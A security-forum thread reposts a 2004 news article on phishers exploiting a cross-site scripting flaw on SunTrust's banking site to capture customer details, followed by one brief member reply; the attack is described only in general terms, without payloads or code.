UGN Security Forums
My ProfileMember DirectoryLogin
Search our ForumsView our FAQView our Site Rules
View our CalendarView our Active TopicsGo to our Main Page

UGN Security Store

Network Sites UGN Security, The GoNix Initiative, Elite Web Gamers, Back of the Web, EveryDay Helper, VNC Web Design & Development
Sponsored Links
Latest Postings
by Gremelin
Yesterday at 06:01 PM
Latest Reviews
Topic Options
Rate This Topic
#39121 - 12/08/04 03:01 AM Banking site hijacked by fraudsters
Ice Offline
UGN News Staff

Registered: 11/29/02
Posts: 1146
Loc: Canada
raudsters have used a clever web-programming trick to turn a legitimate banking site into a tool for stealing account information.

Suntrust, a bank based in Georgia, US, has fallen foul of the deception, according to web security experts who received emails designed to swindle customers.

Researchers at UK-based web-monitoring firm Netcraft received emails claiming to come from Suntrust that ask customers to verify their account information using a link embedded in the message.

But the email was not sent from the bank's own servers and the web page it linked to contained extra characters in the URL address line - added on to the bank’s legitimate web address. So, while the page was hosted by the bank’s servers, hackers had overlaid it with altered elements to give the appearance of a legitimate “Account Verification” page.

Decoding these altered elements revealed a link to an alternative server controlled by the hackers. Customers entering their account information onto the overlaid page were inadvertently sending their details to be recorded by the hackers’ web server.

Pass it on

Netcraft engineer Paul Mutton says the "phishing" trick is made worse because it exploits the bank’s own site. "As far as the user is concerned, they are visiting a legitimate site," he says.

Known as a "cross-site scripting vulnerability" the trick allows an outsider to add to and alter a real web page with their own text and links. The problem can be exploited when the code used by the website operator - to process information for their web page - has not been written specifically to exclude outside, or untrusted, data.

"If you're web programming, you should really make sure data [entered in a URL] is sanitised," Mutton adds.

Since being informed by Netcraft, Suntrust has modified its site to prevent the trick working. Following a link from one of the phishing emails now produces a genuine web page.

Experts had previously warned that many sites could be vulnerable to cross-site scripting. A report released in September 2004 by UK computer security firm Next Generation Security (NGS) suggested that as many as nine out of 10 bank websites could be open to this type of flaw.

Source: News Scientist
Good artists copy, great artists


Sponsored Links
#39122 - 12/08/04 07:36 AM Re: Banking site hijacked by fraudsters
Gremelin Online   shocked

Community Owner

Registered: 02/28/02
Posts: 7194
Loc: Portland, OR; USA
I've been getting these emails for years... It's sad though as I don't bank with them lol...
Donate to UGN Security here.
UGN Security, Back of the Web, Elite Web Gamers & VNC Web Design Owner


Featured Member
Registered: 03/02/02
Posts: 137
Forum Stats
2158 Members
46 Forums
41514 Topics
76689 Posts

Max Online: 1567 @ 04/25/10 02:20 AM
Top Posters
UGN Security 34676
Gremelin 7194
§intå× 3255
SilentRage 1273
Ice 1146
pergesu 1136
Infinite 1041
jonconley 955
Girlie 908
unreal 860
Newest Members
Jan Havelles, Herbert_Sherbert, codemauve, Lillysdragon1984, Brewwit
2158 Registered Users
Who's Online
1 registered (Gremelin), 231 Guests and 318 Spiders online.
Key: Admin, Global Mod, Mod
Latest News

  Get Firefox!
Get FireFox!